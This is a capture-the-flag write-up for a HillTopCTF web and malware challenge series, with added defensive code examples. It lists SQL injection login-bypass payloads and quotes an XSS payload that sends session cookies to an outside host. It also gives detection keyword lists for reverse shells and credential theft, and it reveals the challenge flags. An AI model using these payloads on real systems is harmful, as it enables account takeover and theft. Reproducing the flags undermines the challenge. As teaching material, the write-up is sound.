IF YOU ARE A BEGINNER PLEASE DON'T GO STRAIGHT TO THE ANSWER/FLAG. Try to understand how everything works... because after all what matters is the knowledge acquired


Beep Beep Boop [Warmup]

Hey, Hey you! Yes you! I visited this weird website and suddenly started hearing some beep boop beep sounds... Can you help me figure out what it could be?
This web challenge has multiple references to robots.
When you hear the word robots in the web field, we all know we're talking about Web Wanderers, Crawlers or Spiders. Read more about crawlers here!

These web crawlers are savages! We must control them and tell them where they can go and where they cannot go... This is why there is a common file called "robots.txt".
In this file we specifically say what is allowed and what is not. (let's be real here... none of them actually respect it haha)

Having this information, let's now check if there is a robots.txt file.
Whoa... what did we find here?
User-agent: *
Disallow: /NmZmOWQ1MzkwNDdmZGUxNTllODhkMmQxZTExZWY1NzQuaHRtbA==

That looks like Base64... let's try decoding it!
6ff9d539047fde159e88d2d1e11ef574.html

Hummm... looks like a random html page... let's try accessing it.
Beep* Beep* Boop* Beep* Beep* HillTopCTF{Mr_r0b0t_w4s_h3r3_1ak20isjkd}

We got it!
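The takeaway for site owners: robots.txt is world-readable, and Base64 is an encoding, not protection. As an added example (not part of the original challenge), this check walks a robots.txt and reports Disallow entries that are just encoded file names; the sample input is constructed from the lines shown above plus an assumed `/admin/` entry.

```python
import base64
import re

# Constructed sample: the robots.txt from this writeup plus one ordinary entry.
ROBOTS_TXT = """\
User-agent: *
Disallow: /NmZmOWQ1MzkwNDdmZGUxNTllODhkMmQxZTExZWY1NzQuaHRtbA==
Disallow: /admin/
"""

# Standard or URL-safe Base64 alphabet, at least 8 characters, optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/_-]{8,}={0,2}")


def decode_if_base64(segment):
    """Return the decoded text if segment is Base64 of printable ASCII, else None."""
    if len(segment) % 4 or not B64_RE.fullmatch(segment):
        return None
    try:
        # binascii.Error and UnicodeDecodeError are both ValueError subclasses.
        text = base64.b64decode(segment, altchars=b"-_", validate=True).decode("ascii")
    except ValueError:
        return None
    return text if text.isprintable() else None


def audit_robots(robots_txt):
    """List (disallowed path, decoded value) pairs for encoded path segments."""
    findings = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        field, _, value = line.partition(":")
        if field.strip().lower() != "disallow":
            continue
        path = value.strip()
        for segment in filter(None, path.split("/")):
            decoded = decode_if_base64(segment)
            if decoded is not None:
                findings.append((path, decoded))
    return findings


if __name__ == "__main__":
    for path, decoded in audit_robots(ROBOTS_TXT):
        print(f"{path} -> {decoded}")
```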

Drop The Anchor [Warmup2]

There isn't much to say about this one... it's pretty much analysing code and giving it the right input.

Quick steps to solve it:

The JS code is analysing 13 chars from an anchor and matching against a specific character.

1st Step - Reverse Engineer the code so we get the right anchor
2nd Step - Add the anchor to the url (#weareanchored)
3rd Step - md5 the anchor and add it to the anchor (#weareanchored_c5c8a607a07dbd08ac8f58499ea1ed19)

tada! ;)

P2SEC 1 - Building

Looking closely at the buttons, some appear to be worn off...
It's a combination of 4 numbers and we know which ones they are... 1 4 6 8

If we inspect the html code, someone left a note on the wall mentioning that the code starts with the number 4.
So all we have to do now is "bruteforce" it.

The right code is 4 1 6 8


P2SEC 2 - Login

This is a simple SQLi (SQL Injection) challenge.
The vulnerable field is Password and some of the following payloads would let the user bypass the login. (there are more)

- ' or '1'='1
- " or "1"="1
- "or"1"="1
- " OR "1"="1
- "OR"1"="1
tada! we are in!
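Why this works, and what fixes it, as an added example (not the challenge's own code): the backend query is not shown in the writeup, so the table, column names, and the user `alice` below are assumptions, and SQLite stands in for whatever database the challenge used.

```python
import sqlite3


def make_db():
    """Constructed stand-in database; plaintext password only to keep it short."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return db


def login_vulnerable(db, username, password):
    """String concatenation: quotes in the input become part of the SQL syntax."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username, password):
    """Bound parameters: the input is always treated as a value, never as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


PAYLOAD = "' or '1'='1"  # first payload from the list above

if __name__ == "__main__":
    db = make_db()
    # Vulnerable form evaluates: (username='alice' AND password='') OR '1'='1'
    print("vulnerable, payload:    ", login_vulnerable(db, "alice", PAYLOAD))
    print("parameterized, payload: ", login_parameterized(db, "alice", PAYLOAD))
    print("parameterized, real pw: ", login_parameterized(db, "alice", "correct-horse"))
```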

P2SEC 3 - Tickets

This challenge might be a little bit boring, but it's required to make sense of the storyline.

Players are first presented with 4 tickets which are perfectly fine.
They must submit answers to all of them in order to progress.

The only requirement for a valid answer is a minimum of 50 characters.
(The content of the answer isn't being analysed, but could be done to make it harder)


Once we've done that for the first 4 tickets, we will unlock 3 more.

Now... the 6th ticket, which is #6841711215 has a small payload to steal the session cookies.
All we have to do is open the source-code and copy the original and unrendered payload.

This is obviously an issue that must be reported... Let's head to the report page and fill the form with:
- 6841711215
- Suspicious Code
- < img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://dumpbin.com/binarygirl1010?c'+document.cookie;>
- Comments are not required.


P2SEC 4 - Escalating

Given the information on the hints, let's crawl for some pages!

I've used DIRB.

Multiple files will come up, but only adminpanel.php is the right one.
If we try to access it, it's going to give us a 400 Bad Request.

If we change the request method to POST, we are going to start receiving a couple of PHP Errors.
With those errors we will be able to keep adding data to our payload until it's accepted.

Data Required:

- admin_name -> ross (found on the chall's brief)
- action -> set
- level -> 1
- target -> user's cookie

Your final payload should look something like


P2SEC 5 - PromoTest

There isn't much to this challenge... It's more educational than a challenge itself.

Analyse each report and mark them as positive.
This time, the user's input is being validated.

If you get your answer wrong, you will be demoted.

Here are the keywords being verified for each ticket. (1 keyword found = pass)

#1 - disable|kill|stop|end|anti
#2 - steal|rob|hijack|credentials|username|password|login|money|cash|bank|credit|bitcoin
#3 - reverse|shell|php|remote|connection|code|execution

When all of them are correctly marked as positive, you will have access to 2 new pages. The flag is in Logs.


P2SEC 6 - Authorities

The following data about the hacker must be submitted to be able to retrieve the flag.

- Real Name -> Amy Sophia from https://www.instagram.com/depressedegurl666/ (found plain text in one of the gifs)
- Nickname -> binarygirl1010 (on the ticket payload)
- Real Address -> 62 Matilda St Port Lincoln SA 50606, Australia (me.jpg exif-data)
- Email Address -> h3ll22231144666999@protonmail.com (found on a note after defeating the malware)
- BTC/Paypal Address -> 1Z2Q89voyjwrVkbb6RfHAiLgqCaMs15w4 (in the malware's instructions)
- Known Ip Address -> (from logs)

The IP linking to the hacker could be found in the logs by searching for the same date on which the hacker submitted the malicious ticket.


P2SEC 6.1 - Tunnel

3 Part Flag.

The malware is considered defeated when the user pays the hacker.
Every 10 seconds an HTTP request is made to a certain IP to check if the payment was done.

This can be achieved using, for example, Fiddler

All the player has to do is:
1st - Intercept the packet on the way back
2nd - Grab the encrypted information
3rd - Decrypt the hash, which is in md5, and follows the format: Windows user + _0 (for example: john_0)
4th - Change the flag from 0 to 1
5th - Hash it again in md5
6th - Swap the hashes on the packet

You have now manipulated the malware into thinking that you have paid the hacker!
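Steps 3 to 5 work because an unkeyed MD5 of a guessable string is a lookup problem, not encryption. The sketch below is an added example, not the challenge's code: the candidate user list and the `keyed_token` contrast are assumptions, showing that only a MAC under a secret key would stop the value being recomputed by whoever sits on the wire.

```python
import hashlib
import hmac


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def recover_status(token, candidate_users):
    """Find the '<user>_<flag>' string behind an unkeyed MD5 token by guessing."""
    for user in candidate_users:
        for flag in ("0", "1"):
            plain = f"{user}_{flag}"
            if hmac.compare_digest(md5_hex(plain), token):
                return plain
    return None


def mark_paid(token, candidate_users):
    """Steps 3-5 above: recover the plaintext, set the flag to 1, hash again."""
    plain = recover_status(token, candidate_users)
    if plain is None:
        return None
    user = plain.rsplit("_", 1)[0]
    return md5_hex(f"{user}_1")


def keyed_token(key, user, paid):
    """Contrast (assumed design): a status value authenticated with a secret key."""
    msg = f"{user}_{int(paid)}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


if __name__ == "__main__":
    # Constructed sample: the token for the writeup's example value john_0.
    intercepted = md5_hex("john_0")
    users = ["alice", "john"]  # the local Windows user name is known on the machine
    print(recover_status(intercepted, users))
    print(mark_paid(intercepted, users) == md5_hex("john_1"))
    # Without the key, a recomputed value does not match the keyed token.
    print(keyed_token(b"guess", "john", True) == keyed_token(b"secret", "john", True))
```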

Part 1 -> base64( HilltopCTF{S1mpl3_m4lwar3_ ) - Hidden in the temp folder of windows (666.txt)
Part 2 -> base64( 4n4lysis_0011 ) - Windows Registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\666)
Part 3 -> base64( 0011ks0k2kso} ) - Follow Link on a note on desktop after defeating malware

It was just a simple but fun challenge :p

If you'd like a more detailed writeup on the challenges, feel free to dm me and I will be more than happy to supply you! ❤️